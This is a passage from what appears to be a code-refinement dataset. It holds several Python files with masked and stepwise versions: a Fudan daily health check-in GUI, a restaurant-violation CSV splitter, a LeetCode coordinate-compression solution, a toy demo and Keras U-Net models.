root.mainloop()\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "#!/usr/bin/env python\n# ! -*- coding: utf-8 -*-\n'''\n@Time : 2020/6/4 16:33\n@Author : MaohuaYang\n@Contact : [email protected]\n@File : pinganFudan-GUI.py\n@Software: PyCharm\n'''\n\nimport time\nimport requests\nimport tkinter as tk\nfrom login import Ehall\n\ndef set_win_center(root, curWidth='', curHight=''):\n \"\"\"\n 设置窗口大小,并居中显示\n :param root:主窗体实例\n :param curWidth:窗口宽度,非必填,默认200\n :param curHight:窗口高度,非必填,默认200\n :return:无\n \"\"\"\n if not curWidth:\n '''获取窗口宽度,默认200'''\n curWidth = root.winfo_width()\n if not curHight:\n '''获取窗口高度,默认200'''\n curHight = root.winfo_height()\n # print(curWidth, curHight)\n\n # 获取屏幕宽度和高度\n scn_w, scn_h = root.maxsize()\n # print(scn_w, scn_h)\n\n # 计算中心坐标\n cen_x = (scn_w - curWidth) / 2\n cen_y = (scn_h - curHight) / 2\n # print(cen_x, cen_y)\n\n # 设置窗口初始大小和位置\n size_xy = '%dx%d+%d+%d' % (curWidth, curHight, cen_x, cen_y)\n root.geometry(size_xy)\n\ndef sign_up(ehall, address_info):\n url = 'https://zlapp.fudan.edu.cn/ncov/wap/fudan/get-info'\n response = ehall.session.get(url, headers=ehall.headers, verify=False)\n data = response.json()\n\n url = 'https://zlapp.fudan.edu.cn/ncov/wap/fudan/save'\n data['d']['info'].update(address_info)\n post_data = data['d']['info']\n response = ehall.session.post(url, data=post_data, verify=False, headers=ehall.headers)\n\n return response.json()\n\n\ndef main():\n root = tk.Tk()\n root.title(\"DailyFudan\")\n set_win_center(root, 700, 350)\n root.resizable(0, 0)\n\n # user ID\n lblid = tk.Label(root, text=\"学号:\")\n lblid.grid(row=0, column=0)\n #lid.pack()\n\n entID = tk.Entry(root)\n entID.grid(row=0, column=1, padx=25, pady=0)\n #entID.pack()\n # password\n lblPW = tk.Label(root, text=\"Ehall密码:\")\n lblPW.grid(row=1, column=0)\n #lPW.pack()\n entPW = tk.Entry(root, show=\"*\")\n entPW.grid(row=1, column=1)\n #entPW.pack()\n\n # location information\n lblArea = tk.Label(root, text='区域:')\n lblArea.grid(row=2, column=0)\n varArea = tk.StringVar(value=\"上海市 杨浦区\")\n entArea = tk.Entry(root, textvariable=varArea, width=20)\n entArea.grid(row=2, column=1)\n #entArea.pack()\n lblProv = tk.Label(root, text='省份:')\n lblProv.grid(row=3, column=0)\n varProv = tk.StringVar(value=\"上海\")\n entProv = tk.Entry(root, textvariable=varProv, width=20)\n entProv.grid(row=3, column=1)\n #entProv.pack()\n lblCity = tk.Label(root, text='城市:')\n lblCity.grid(row=4, column=0)\n varCity = tk.StringVar(value=\"上海市\")\n entCity = tk.Entry(root, textvariable=varCity, width=20)\n entCity.grid(row=4, column=1)\n #entCity.pack()\n\n # auto submit\n # to be continue\n\n # log area\n scroll = tk.Scrollbar()\n\n textlog = tk.Text(root, state=tk.DISABLED, width=50, bg='lightgray')\n textlog.grid(row=0, rowspan=6, column=2, sticky=tk.S+tk.W+tk.E+tk.N)\n scroll.grid(row=0, rowspan=6, column=3, sticky=tk.S + tk.W + tk.E + tk.N, ipadx=0)\n scroll.config(command=textlog.yview)\n textlog.config(yscrollcommand=scroll.set)\n\n def submit_btn_cmd():\n id = entID.get().strip()\n pw = entPW.get().strip()\n config = {\n 'id': id,\n 'pw': pw\n }\n ehall = Ehall(config)\n ehall.login()\n if ehall.username:\n address_info = {\n \"area\": varArea.get(),\n \"province\": varProv.get(),\n \"city\": varCity.get()\n }\n data = sign_up(ehall, address_info)\n print(data)\n if data['e'] == 0:\n log = \">>填报成功!%s %s\\n\" % (ehall.username, time.ctime())\n else:\n log = \">>今日已填报!%s %s\\n\" % (ehall.username, time.ctime())\n else:\n log = \">>登录失败!%s %s\\n\" % (ehall.username, time.ctime())\n textlog.config(state=tk.NORMAL)\n textlog.insert(\"insert\", 
log)\n textlog.config(state=tk.DISABLED)\n\n btuExit = tk.Button(root, text='退出', command=root.quit, width=10)\n btuExit.grid(row=5, column=1, pady=2)\n btuSub = tk.Button(root, text=\"提交\", command=submit_btn_cmd, width=10)\n btuSub.grid(row=5, column=0, pady=2, padx=20)\n\n root.mainloop()\n\n\nif __name__ == \"__main__\":\n main()\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
import csv
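# Splits the comma-separated violation codes in column 20 of each inspection row and writes
# one output row per violation code, paired with the row's first column.
# Note: opening the input with 'rb' assumes Python 2; under Python 3, open both files in
# text mode (newline='') for the csv module.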
with open('healthviolations.csv', 'w') as fp:
with open('Restaurant_Inspections.csv', 'rb') as csvfile:
reader = csv.reader(csvfile)
header = next(reader, None)
writer = csv.writer(fp, delimiter=',')
writer.writerow([header[0], "violation"])
for row in reader:
if (row[20] != '') :
violationarr = row[20].split(",")
for violation in violationarr :
writer.writerow([row[0], violation])
# writer.writerow([header[0], header[1], "violation"])
# writer.writerow([row[0], row[1], violation])
|
normal
|
{
"blob_id": "1825b365032a224ed56a1814d7f6457e2add8fdd",
"index": 8008,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith open('healthviolations.csv', 'w') as fp:\n with open('Restaurant_Inspections.csv', 'rb') as csvfile:\n reader = csv.reader(csvfile)\n header = next(reader, None)\n writer = csv.writer(fp, delimiter=',')\n writer.writerow([header[0], 'violation'])\n for row in reader:\n if row[20] != '':\n violationarr = row[20].split(',')\n for violation in violationarr:\n writer.writerow([row[0], violation])\n",
"step-3": "import csv\nwith open('healthviolations.csv', 'w') as fp:\n with open('Restaurant_Inspections.csv', 'rb') as csvfile:\n reader = csv.reader(csvfile)\n header = next(reader, None)\n writer = csv.writer(fp, delimiter=',')\n writer.writerow([header[0], 'violation'])\n for row in reader:\n if row[20] != '':\n violationarr = row[20].split(',')\n for violation in violationarr:\n writer.writerow([row[0], violation])\n",
"step-4": "import csv\n\nwith open('healthviolations.csv', 'w') as fp:\n\n with open('Restaurant_Inspections.csv', 'rb') as csvfile:\n reader = csv.reader(csvfile)\n header = next(reader, None)\n writer = csv.writer(fp, delimiter=',')\n writer.writerow([header[0], \"violation\"])\n for row in reader:\n if (row[20] != '') :\n violationarr = row[20].split(\",\")\n for violation in violationarr :\n writer.writerow([row[0], violation])\n\n\n# writer.writerow([header[0], header[1], \"violation\"])\n# writer.writerow([row[0], row[1], violation])\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# LCP 74. Strongest Blessing Force Field - coordinate compression + 2D difference array
# https://leetcode.cn/problems/xepqZ5/
# forceField[i] = [x, y, side] means the i-th field covers the square of side length `side` centered at (x, y).
# !The field strength at a point equals the number of fields covering it; return the maximum field strength anywhere.
# !Collect all lower-left and upper-right corners; coordinates may be half-integers, so multiply everything by 2.
# O(n^2)
from typing import List
from 二维差分模板 import DiffMatrix
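# DiffMatrix comes from a local helper module; as used below, add(r1, c1, r2, c2, delta) stages a
# rectangle increment, update() materializes the staged increments, and query(i, j) reads a cell.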
class Solution:
def fieldOfGreatestBlessing(self, forceField: List[List[int]]) -> int:
        # Coordinate compression
allX, allY = set(), set()
for x, y, side in forceField:
allX.add(2 * x - side)
allX.add(2 * x + side)
allY.add(2 * y - side)
allY.add(2 * y + side)
sortedX = sorted(allX)
sortedY = sorted(allY)
rankX = {x: i for i, x in enumerate(sortedX)}
rankY = {y: i for i, y in enumerate(sortedY)}
        # 2D difference array
row, col = len(sortedX), len(sortedY)
diffMatrix = DiffMatrix([[0] * col for _ in range(row)])
for x, y, side in forceField:
r1, c1 = rankX[2 * x - side], rankY[2 * y - side]
r2, c2 = rankX[2 * x + side], rankY[2 * y + side]
diffMatrix.add(r1, c1, r2, c2, 1)
diffMatrix.update()
res = 0
for i in range(row):
for j in range(col):
res = max(res, diffMatrix.query(i, j))
return res
|
normal
|
{
"blob_id": "0212382b5c8cc1e98142a784fd26efd577ebceaf",
"index": 1656,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Solution:\n\n def fieldOfGreatestBlessing(self, forceField: List[List[int]]) ->int:\n allX, allY = set(), set()\n for x, y, side in forceField:\n allX.add(2 * x - side)\n allX.add(2 * x + side)\n allY.add(2 * y - side)\n allY.add(2 * y + side)\n sortedX = sorted(allX)\n sortedY = sorted(allY)\n rankX = {x: i for i, x in enumerate(sortedX)}\n rankY = {y: i for i, y in enumerate(sortedY)}\n row, col = len(sortedX), len(sortedY)\n diffMatrix = DiffMatrix([([0] * col) for _ in range(row)])\n for x, y, side in forceField:\n r1, c1 = rankX[2 * x - side], rankY[2 * y - side]\n r2, c2 = rankX[2 * x + side], rankY[2 * y + side]\n diffMatrix.add(r1, c1, r2, c2, 1)\n diffMatrix.update()\n res = 0\n for i in range(row):\n for j in range(col):\n res = max(res, diffMatrix.query(i, j))\n return res\n",
"step-4": "from typing import List\nfrom 二维差分模板 import DiffMatrix\n\n\nclass Solution:\n\n def fieldOfGreatestBlessing(self, forceField: List[List[int]]) ->int:\n allX, allY = set(), set()\n for x, y, side in forceField:\n allX.add(2 * x - side)\n allX.add(2 * x + side)\n allY.add(2 * y - side)\n allY.add(2 * y + side)\n sortedX = sorted(allX)\n sortedY = sorted(allY)\n rankX = {x: i for i, x in enumerate(sortedX)}\n rankY = {y: i for i, y in enumerate(sortedY)}\n row, col = len(sortedX), len(sortedY)\n diffMatrix = DiffMatrix([([0] * col) for _ in range(row)])\n for x, y, side in forceField:\n r1, c1 = rankX[2 * x - side], rankY[2 * y - side]\n r2, c2 = rankX[2 * x + side], rankY[2 * y + side]\n diffMatrix.add(r1, c1, r2, c2, 1)\n diffMatrix.update()\n res = 0\n for i in range(row):\n for j in range(col):\n res = max(res, diffMatrix.query(i, j))\n return res\n",
"step-5": "# LCP 74. 最强祝福力场-离散化+二维差分\r\n# https://leetcode.cn/problems/xepqZ5/\r\n# forceField[i] = [x,y,side] 表示第 i 片力场将覆盖以坐标 (x,y) 为中心,边长为 side 的正方形区域。\r\n# !若任意一点的 力场强度 等于覆盖该点的力场数量,请求出在这片地带中 力场强度 最强处的 力场强度。\r\n\r\n# !统计所有左下和右上坐标,由于会出现 0.5可以将坐标乘 2。\r\n# O(n^2)\r\n\r\n\r\nfrom typing import List\r\nfrom 二维差分模板 import DiffMatrix\r\n\r\n\r\nclass Solution:\r\n def fieldOfGreatestBlessing(self, forceField: List[List[int]]) -> int:\r\n # 离散化\r\n allX, allY = set(), set()\r\n for x, y, side in forceField:\r\n allX.add(2 * x - side)\r\n allX.add(2 * x + side)\r\n allY.add(2 * y - side)\r\n allY.add(2 * y + side)\r\n sortedX = sorted(allX)\r\n sortedY = sorted(allY)\r\n rankX = {x: i for i, x in enumerate(sortedX)}\r\n rankY = {y: i for i, y in enumerate(sortedY)}\r\n\r\n # 二维差分\r\n row, col = len(sortedX), len(sortedY)\r\n diffMatrix = DiffMatrix([[0] * col for _ in range(row)])\r\n for x, y, side in forceField:\r\n r1, c1 = rankX[2 * x - side], rankY[2 * y - side]\r\n r2, c2 = rankX[2 * x + side], rankY[2 * y + side]\r\n diffMatrix.add(r1, c1, r2, c2, 1)\r\n\r\n diffMatrix.update()\r\n\r\n res = 0\r\n for i in range(row):\r\n for j in range(col):\r\n res = max(res, diffMatrix.query(i, j))\r\n return res\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
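The solution in the record above imports DiffMatrix from a local helper module (二维差分模板) that is not part of the record. A minimal sketch of such a 2D difference-array helper, written only to match the add / update / query calls used above (the real module's implementation is an assumption), is:

class DiffMatrix:
    """2D difference array: O(1) rectangle increments, one pass to materialise them."""

    def __init__(self, matrix):
        self.row = len(matrix)
        self.col = len(matrix[0]) if self.row else 0
        self.matrix = [r[:] for r in matrix]
        # one spare row/column so add() never writes out of bounds
        self._diff = [[0] * (self.col + 1) for _ in range(self.row + 1)]

    def add(self, r1, c1, r2, c2, delta):
        # add delta to every cell of the inclusive rectangle (r1, c1)-(r2, c2)
        self._diff[r1][c1] += delta
        self._diff[r1][c2 + 1] -= delta
        self._diff[r2 + 1][c1] -= delta
        self._diff[r2 + 1][c2 + 1] += delta

    def update(self):
        # 2D prefix sum over the difference grid, folded into self.matrix
        for i in range(self.row):
            for j in range(self.col):
                if i:
                    self._diff[i][j] += self._diff[i - 1][j]
                if j:
                    self._diff[i][j] += self._diff[i][j - 1]
                if i and j:
                    self._diff[i][j] -= self._diff[i - 1][j - 1]
                self.matrix[i][j] += self._diff[i][j]

    def query(self, i, j):
        return self.matrix[i][j]

add() is O(1) per rectangle and update() materialises everything in one O(row * col) pass, which is what keeps the overall solution at roughly O(n^2) after coordinate compression.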
def helloWorld():
    print("We are in DEMO land!")


def listBuilder():
    # build [0, 10, 20, 30, 40]
    b = []
    for x in range(5):
        b.append(10 * x)
    return b


for i in range(10):
    helloWorld()
# listBuilder must be defined before it is called here
print(listBuilder())

print("[done, for real]")
|
normal
|
{
"blob_id": "57516a17c1f3ee208076852369999d74dbb2b3ba",
"index": 98,
"step-1": "def helloWorld():\n print \"We are in DEMO land!\"\n\nfor i in range(10):\n helloWorld()\nprint listBuilder()\n\ndef listBuilder():\n b = []\n for x in range(5):\n b.append(10 * x)\n return b\n\nprint \"[done, for real]\"\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from keras.models import *
from keras.layers import *
from keras.optimizers import *
from keras.callbacks import ModelCheckpoint, LearningRateScheduler
from keras import backend as keras
unet_feature_n = 512
unet_feature_nstep_size = 1e-4
unet_input_image_size = 128
def unet(pretrained_weights=None, input_size=(unet_input_image_size, unet_input_image_size, 1)):
inputs = Input(input_size)
conv1 = Conv2D(unet_feature_n // 16, 3, activation='relu', padding='same', kernel_initializer='he_normal')(inputs)
conv1 = Conv2D(unet_feature_n // 16, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv1)
pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)
conv2 = Conv2D(unet_feature_n // 8, 3, activation='relu', padding='same', kernel_initializer='he_normal')(pool1)
conv2 = Conv2D(unet_feature_n // 8, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv2)
pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)
conv3 = Conv2D(unet_feature_n // 4, 3, activation='relu', padding='same', kernel_initializer='he_normal')(pool2)
conv3 = Conv2D(unet_feature_n // 4, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv3)
pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)
conv4 = Conv2D(unet_feature_n // 2, 3, activation='relu', padding='same', kernel_initializer='he_normal')(pool3)
conv4 = Conv2D(unet_feature_n // 2, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv4)
drop4 = Dropout(0.5)(conv4)
pool4 = MaxPooling2D(pool_size=(2, 2))(drop4)
conv5 = Conv2D(unet_feature_n, 3, activation='relu', padding='same', kernel_initializer='he_normal')(pool4)
conv5 = Conv2D(unet_feature_n, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv5)
drop5 = Dropout(0.5)(conv5)
up6 = Conv2D(unet_feature_n // 2, 2, activation='relu', padding='same', kernel_initializer='he_normal')(
UpSampling2D(size=(2, 2))(drop5))
merge6 = concatenate([drop4, up6], axis=3)
conv6 = Conv2D(unet_feature_n // 2, 3, activation='relu', padding='same', kernel_initializer='he_normal')(merge6)
conv6 = Conv2D(unet_feature_n // 2, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv6)
up7 = Conv2D(unet_feature_n // 4, 2, activation='relu', padding='same', kernel_initializer='he_normal')(
UpSampling2D(size=(2, 2))(conv6))
merge7 = concatenate([conv3, up7], axis=3)
conv7 = Conv2D(unet_feature_n // 4, 3, activation='relu', padding='same', kernel_initializer='he_normal')(merge7)
conv7 = Conv2D(unet_feature_n // 4, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv7)
up8 = Conv2D(unet_feature_n // 8, 2, activation='relu', padding='same', kernel_initializer='he_normal')(
UpSampling2D(size=(2, 2))(conv7))
merge8 = concatenate([conv2, up8], axis=3)
conv8 = Conv2D(unet_feature_n // 8, 3, activation='relu', padding='same', kernel_initializer='he_normal')(merge8)
conv8 = Conv2D(unet_feature_n // 8, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv8)
up9 = Conv2D(unet_feature_n // 16, 2, activation='relu', padding='same', kernel_initializer='he_normal')(
UpSampling2D(size=(2, 2))(conv8))
merge9 = concatenate([conv1, up9], axis=3)
conv9 = Conv2D(unet_feature_n // 16, 3, activation='relu', padding='same', kernel_initializer='he_normal')(merge9)
conv9 = Conv2D(unet_feature_n // 16, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv9)
conv9 = Conv2D(2, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv9)
conv10 = Conv2D(1, 1, activation='sigmoid')(conv9)
model = Model(inputs=inputs, outputs=conv10)
model.compile(optimizer=Adam(lr=unet_feature_nstep_size), loss='binary_crossentropy', metrics=['accuracy'])
if (pretrained_weights):
model.load_weights(pretrained_weights)
return model
def small_unet(pretrained_weights=False, patch_size=128):
input_ = Input((patch_size, patch_size, 1))
skips = []
output = input_
for shape, filters in zip([5, 3, 3, 3, 3, 3, 3], [16, 32, 64, 64, 64, 64, 64]):
skips.append(output)
print(output.shape)
output= Conv2D(filters, (shape, shape), strides=2, padding="same", activation="relu")(output)
#output = BatchNormalization()(output)
#if shape != 7:
# output = BatchNormalization()(output)
for shape, filters in zip([4, 4, 4, 4, 4, 4, 4, 4], [64, 64, 64, 64,32, 16, 2]):
output = UpSampling2D()(output)
skip_output = skips.pop()
output = concatenate([output, skip_output], axis=3)
if filters != 2:
activation = "relu"
else:
activation = "softmax"
output = Conv2D(filters if filters != 2 else 2, (shape, shape), activation=activation, padding="same")(output)
if filters != 2:
output = BatchNormalization(momentum=.9)(output)
assert len(skips) == 0
m = Model([input_], [output])
if pretrained_weights:
m.load_weights(pretrained_weights)
m.compile(optimizer=Adam(), loss='binary_crossentropy', metrics=['accuracy'])
return m
|
normal
|
{
"blob_id": "b8d45a0028cb4e393ddca9dd6d246289328d1791",
"index": 4044,
"step-1": "<mask token>\n\n\ndef small_unet(pretrained_weights=False, patch_size=128):\n input_ = Input((patch_size, patch_size, 1))\n skips = []\n output = input_\n for shape, filters in zip([5, 3, 3, 3, 3, 3, 3], [16, 32, 64, 64, 64, \n 64, 64]):\n skips.append(output)\n print(output.shape)\n output = Conv2D(filters, (shape, shape), strides=2, padding='same',\n activation='relu')(output)\n for shape, filters in zip([4, 4, 4, 4, 4, 4, 4, 4], [64, 64, 64, 64, 32,\n 16, 2]):\n output = UpSampling2D()(output)\n skip_output = skips.pop()\n output = concatenate([output, skip_output], axis=3)\n if filters != 2:\n activation = 'relu'\n else:\n activation = 'softmax'\n output = Conv2D(filters if filters != 2 else 2, (shape, shape),\n activation=activation, padding='same')(output)\n if filters != 2:\n output = BatchNormalization(momentum=0.9)(output)\n assert len(skips) == 0\n m = Model([input_], [output])\n if pretrained_weights:\n m.load_weights(pretrained_weights)\n m.compile(optimizer=Adam(), loss='binary_crossentropy', metrics=[\n 'accuracy'])\n return m\n",
"step-2": "<mask token>\n\n\ndef unet(pretrained_weights=None, input_size=(unet_input_image_size,\n unet_input_image_size, 1)):\n inputs = Input(input_size)\n conv1 = Conv2D(unet_feature_n // 16, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(inputs)\n conv1 = Conv2D(unet_feature_n // 16, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv1)\n pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)\n conv2 = Conv2D(unet_feature_n // 8, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(pool1)\n conv2 = Conv2D(unet_feature_n // 8, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv2)\n pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)\n conv3 = Conv2D(unet_feature_n // 4, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(pool2)\n conv3 = Conv2D(unet_feature_n // 4, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv3)\n pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)\n conv4 = Conv2D(unet_feature_n // 2, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(pool3)\n conv4 = Conv2D(unet_feature_n // 2, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv4)\n drop4 = Dropout(0.5)(conv4)\n pool4 = MaxPooling2D(pool_size=(2, 2))(drop4)\n conv5 = Conv2D(unet_feature_n, 3, activation='relu', padding='same',\n kernel_initializer='he_normal')(pool4)\n conv5 = Conv2D(unet_feature_n, 3, activation='relu', padding='same',\n kernel_initializer='he_normal')(conv5)\n drop5 = Dropout(0.5)(conv5)\n up6 = Conv2D(unet_feature_n // 2, 2, activation='relu', padding='same',\n kernel_initializer='he_normal')(UpSampling2D(size=(2, 2))(drop5))\n merge6 = concatenate([drop4, up6], axis=3)\n conv6 = Conv2D(unet_feature_n // 2, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(merge6)\n conv6 = Conv2D(unet_feature_n // 2, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv6)\n up7 = Conv2D(unet_feature_n // 4, 2, activation='relu', padding='same',\n kernel_initializer='he_normal')(UpSampling2D(size=(2, 2))(conv6))\n merge7 = concatenate([conv3, up7], axis=3)\n conv7 = Conv2D(unet_feature_n // 4, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(merge7)\n conv7 = Conv2D(unet_feature_n // 4, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv7)\n up8 = Conv2D(unet_feature_n // 8, 2, activation='relu', padding='same',\n kernel_initializer='he_normal')(UpSampling2D(size=(2, 2))(conv7))\n merge8 = concatenate([conv2, up8], axis=3)\n conv8 = Conv2D(unet_feature_n // 8, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(merge8)\n conv8 = Conv2D(unet_feature_n // 8, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv8)\n up9 = Conv2D(unet_feature_n // 16, 2, activation='relu', padding='same',\n kernel_initializer='he_normal')(UpSampling2D(size=(2, 2))(conv8))\n merge9 = concatenate([conv1, up9], axis=3)\n conv9 = Conv2D(unet_feature_n // 16, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(merge9)\n conv9 = Conv2D(unet_feature_n // 16, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv9)\n conv9 = Conv2D(2, 3, activation='relu', padding='same',\n kernel_initializer='he_normal')(conv9)\n conv10 = Conv2D(1, 1, activation='sigmoid')(conv9)\n model = Model(inputs=inputs, outputs=conv10)\n model.compile(optimizer=Adam(lr=unet_feature_nstep_size), loss=\n 
'binary_crossentropy', metrics=['accuracy'])\n if pretrained_weights:\n model.load_weights(pretrained_weights)\n return model\n\n\ndef small_unet(pretrained_weights=False, patch_size=128):\n input_ = Input((patch_size, patch_size, 1))\n skips = []\n output = input_\n for shape, filters in zip([5, 3, 3, 3, 3, 3, 3], [16, 32, 64, 64, 64, \n 64, 64]):\n skips.append(output)\n print(output.shape)\n output = Conv2D(filters, (shape, shape), strides=2, padding='same',\n activation='relu')(output)\n for shape, filters in zip([4, 4, 4, 4, 4, 4, 4, 4], [64, 64, 64, 64, 32,\n 16, 2]):\n output = UpSampling2D()(output)\n skip_output = skips.pop()\n output = concatenate([output, skip_output], axis=3)\n if filters != 2:\n activation = 'relu'\n else:\n activation = 'softmax'\n output = Conv2D(filters if filters != 2 else 2, (shape, shape),\n activation=activation, padding='same')(output)\n if filters != 2:\n output = BatchNormalization(momentum=0.9)(output)\n assert len(skips) == 0\n m = Model([input_], [output])\n if pretrained_weights:\n m.load_weights(pretrained_weights)\n m.compile(optimizer=Adam(), loss='binary_crossentropy', metrics=[\n 'accuracy'])\n return m\n",
"step-3": "<mask token>\nunet_feature_n = 512\nunet_feature_nstep_size = 0.0001\nunet_input_image_size = 128\n\n\ndef unet(pretrained_weights=None, input_size=(unet_input_image_size,\n unet_input_image_size, 1)):\n inputs = Input(input_size)\n conv1 = Conv2D(unet_feature_n // 16, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(inputs)\n conv1 = Conv2D(unet_feature_n // 16, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv1)\n pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)\n conv2 = Conv2D(unet_feature_n // 8, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(pool1)\n conv2 = Conv2D(unet_feature_n // 8, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv2)\n pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)\n conv3 = Conv2D(unet_feature_n // 4, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(pool2)\n conv3 = Conv2D(unet_feature_n // 4, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv3)\n pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)\n conv4 = Conv2D(unet_feature_n // 2, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(pool3)\n conv4 = Conv2D(unet_feature_n // 2, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv4)\n drop4 = Dropout(0.5)(conv4)\n pool4 = MaxPooling2D(pool_size=(2, 2))(drop4)\n conv5 = Conv2D(unet_feature_n, 3, activation='relu', padding='same',\n kernel_initializer='he_normal')(pool4)\n conv5 = Conv2D(unet_feature_n, 3, activation='relu', padding='same',\n kernel_initializer='he_normal')(conv5)\n drop5 = Dropout(0.5)(conv5)\n up6 = Conv2D(unet_feature_n // 2, 2, activation='relu', padding='same',\n kernel_initializer='he_normal')(UpSampling2D(size=(2, 2))(drop5))\n merge6 = concatenate([drop4, up6], axis=3)\n conv6 = Conv2D(unet_feature_n // 2, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(merge6)\n conv6 = Conv2D(unet_feature_n // 2, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv6)\n up7 = Conv2D(unet_feature_n // 4, 2, activation='relu', padding='same',\n kernel_initializer='he_normal')(UpSampling2D(size=(2, 2))(conv6))\n merge7 = concatenate([conv3, up7], axis=3)\n conv7 = Conv2D(unet_feature_n // 4, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(merge7)\n conv7 = Conv2D(unet_feature_n // 4, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv7)\n up8 = Conv2D(unet_feature_n // 8, 2, activation='relu', padding='same',\n kernel_initializer='he_normal')(UpSampling2D(size=(2, 2))(conv7))\n merge8 = concatenate([conv2, up8], axis=3)\n conv8 = Conv2D(unet_feature_n // 8, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(merge8)\n conv8 = Conv2D(unet_feature_n // 8, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv8)\n up9 = Conv2D(unet_feature_n // 16, 2, activation='relu', padding='same',\n kernel_initializer='he_normal')(UpSampling2D(size=(2, 2))(conv8))\n merge9 = concatenate([conv1, up9], axis=3)\n conv9 = Conv2D(unet_feature_n // 16, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(merge9)\n conv9 = Conv2D(unet_feature_n // 16, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv9)\n conv9 = Conv2D(2, 3, activation='relu', padding='same',\n kernel_initializer='he_normal')(conv9)\n conv10 = Conv2D(1, 1, activation='sigmoid')(conv9)\n model = Model(inputs=inputs, 
outputs=conv10)\n model.compile(optimizer=Adam(lr=unet_feature_nstep_size), loss=\n 'binary_crossentropy', metrics=['accuracy'])\n if pretrained_weights:\n model.load_weights(pretrained_weights)\n return model\n\n\ndef small_unet(pretrained_weights=False, patch_size=128):\n input_ = Input((patch_size, patch_size, 1))\n skips = []\n output = input_\n for shape, filters in zip([5, 3, 3, 3, 3, 3, 3], [16, 32, 64, 64, 64, \n 64, 64]):\n skips.append(output)\n print(output.shape)\n output = Conv2D(filters, (shape, shape), strides=2, padding='same',\n activation='relu')(output)\n for shape, filters in zip([4, 4, 4, 4, 4, 4, 4, 4], [64, 64, 64, 64, 32,\n 16, 2]):\n output = UpSampling2D()(output)\n skip_output = skips.pop()\n output = concatenate([output, skip_output], axis=3)\n if filters != 2:\n activation = 'relu'\n else:\n activation = 'softmax'\n output = Conv2D(filters if filters != 2 else 2, (shape, shape),\n activation=activation, padding='same')(output)\n if filters != 2:\n output = BatchNormalization(momentum=0.9)(output)\n assert len(skips) == 0\n m = Model([input_], [output])\n if pretrained_weights:\n m.load_weights(pretrained_weights)\n m.compile(optimizer=Adam(), loss='binary_crossentropy', metrics=[\n 'accuracy'])\n return m\n",
